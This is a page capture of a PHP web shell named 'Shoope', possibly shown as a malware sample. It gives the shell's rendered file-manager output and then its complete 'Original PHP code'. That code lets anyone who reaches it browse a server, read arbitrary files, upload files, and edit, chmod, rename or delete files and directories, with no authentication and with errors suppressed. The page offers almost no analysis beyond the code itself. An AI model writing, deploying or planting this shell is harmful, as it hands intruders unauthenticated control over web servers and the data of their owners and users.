default; user-select: none; position: absolute; font-family: inherit; font-size: 12px; color: rgb(221, 221, 221); z-index: 1000; left: 336.293px; top: 178.4px;">•</span><span id="flake35" style="cursor: default; user-select: none; position: absolute; font-family: inherit; font-size: 22px; color: rgb(238, 238, 238); z-index: 1000; left: 510.239px; top: 273.9px;">•</span>
<script type="text/javascript" src="https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js"></script><span id="flake0" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake1" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake2" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake3" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake4" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake5" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake6" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake7" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake8" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake9" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake10" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake11" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake12" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake13" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake14" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake15" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake16" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake17" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake18" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake19" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake20" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake21" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake22" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake23" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake24" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake25" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake26" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake27" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake28" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake29" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake30" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake31" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake32" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake33" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake34" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake35" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span>
<script type="text/javascript" src="https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js"></script><span id="flake0" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake1" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake2" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake3" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake4" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake5" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake6" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake7" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake8" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake9" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake10" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake11" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake12" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake13" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake14" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake15" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake16" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake17" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake18" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake19" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake20" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake21" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake22" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake23" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake24" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake25" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake26" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake27" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake28" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake29" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake30" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake31" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake32" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake33" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake34" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake35" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span>
<script type="text/javascript" src="https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js"></script><span id="flake0" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake1" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake2" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake3" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake4" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake5" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake6" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake7" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake8" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake9" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake10" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake11" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake12" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake13" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake14" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake15" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake16" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake17" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake18" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake19" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake20" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake21" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake22" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake23" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake24" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake25" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake26" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake27" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake28" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake29" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake30" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake31" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake32" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake33" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake34" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span><span id="flake35" style="cursor: default; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;position:absolute;top:-24">•</span>


<br><hr color=" #55da7b " size="3px" width="1000px&quot;"><div class="pembungkus"><br>
<font color="white">Path :</font> <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/<form enctype="multipart/form-data" method="POST">
<font color="white">File Upload :</font> <input type="file" name="file">
<input type="submit" value="upload">
</form>
<br><center></center><br><div id="content"><table width="1000" border="5" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>JENENG</center></td>
<td><center>UKURAN</center></td>
<td><center>ijin</center></td>
<td><center>ngutek-utek</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td><a href="?filesrc=/var/www/html/a.php&amp;path=/var/www/html">a.php</a></td>
<td><center>9.166 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&amp;path=/var/www/html">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="a.php">
<input type="hidden" name="path" value="/var/www/html/a.php">
<input type="submit" value=">">
</form></center></td>
</tr><tr>
<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&amp;path=/var/www/html">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">">
</form></center></td>
</tr></tbody></table>
</div><center><br><br<br<br< center="">
</br<br<br<></center></div><hr color=" #55da7b " size="3px" width="1000px&quot;">
</font></em></body></html>

Original PHP code




<?php
error_reporting(0);
set_time_limit(0);

if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>
<html>
<head>
<link href="" rel="stylesheet" type="text/css">
<title>Shoope</title>
<style>
body{
font-family: "Arial", cursive;
background-color: black;
color:white;
}
#content tr:hover{
background-color: pink;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: transparant;
}
table{
border: 1px #55da7b  solid;
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.pembungkus {
	width: 1000px;
	border: 1px #55da7b solid;
	margin-buttom: 20px;
	margin: auto;
	padding: 5px;
}
</style>

</head>
<body>
<h1><center>
 <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css"> <em>
   <font face="iceland">
<br>
<font color="red"></font></center></h1><br>
<script type="text/javascript" src="https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js"></script>
<script type="text/javascript" src="https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js"></script>
<script type="text/javascript" src="https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js"></script>
<script type="text/javascript" src="https://www.cssscript.com/demo/minimalist-falling-snow-effect-with-pure-javascript-snow-js/snow.js"></script>


<br><hr color=" #55da7b " size="3px" width=1000px" ><div class="pembungkus"><br>
<font color="white">Path :</font> ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="lime">BERHASIL COK</font><br />';
}else{
echo '<font color="pink">GAGAL COK</font><br/>';
}
}
echo '<form enctype="multipart/form-data" method="POST">
<font color="white">File Upload :</font> <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="lime">Change Permission Berhasil</font><br/>';
}else{
echo '<font color="pink">Change Permission Gagal</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="lime">Ganti Nama Berhasil</font><br/>';
}else{
echo '<font color="pink">Ganti Nama Gagal</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="lime">Berhasil Edit File</font><br/>';
}else{
echo '<font color="pink">Gagal Edit File</font><br/>';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
}
echo '</center>';
}else{
echo '</table><br/><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="lime">Directory Terhapus</font><br/>';
}else{
echo '<font color="pink">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="lime">File Terhapus</font><br/>';
}else{
echo '<font color="pink">File Gagal Dihapus</font><br/>';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<br><div id="content"><table width="1000"  border="5" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>JENENG</peller></center></td>
<td><center>UKURAN</peller></center></td>
<td><center>ijin</peller></center></td>
<td><center>ngutek-utek</peller></center></td>
</tr>';

foreach($scandir as $dir){
if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
echo '<tr>
<td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
<td><center>--</center></td>
<td><center>';
if(is_writable($path.'/'.$dir)) echo '<font color="lime">';
elseif(!is_readable($path.'/'.$dir)) echo '<font color="pink">';
echo perms($path.'/'.$dir);
if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';

echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="'.$dir.'">
<input type="hidden" name="path" value="'.$path.'/'.$dir.'">
<input type="submit" value=">">
</form></center></td>
</tr>';
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file($path.'/'.$file)) continue;
$size = filesize($path.'/'.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

echo '<tr>
<td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
<td><center>'.$size.'</center></td>
<td><center>';
if(is_writable($path.'/'.$file)) echo '<font color="lime">';
elseif(!is_readable($path.'/'.$file)) echo '<font color="pink">';
echo perms($path.'/'.$file);
if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="'.$file.'">
<input type="hidden" name="path" value="'.$path.'/'.$file.'">
<input type="submit" value=">">
</form></center></td>
</tr>';
}
echo '</table>
</div>';
}
echo '<center><br/><br<br<br</center>
</div><hr color=" #55da7b " size="3px" width=1000px" ></body>
</html>';
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}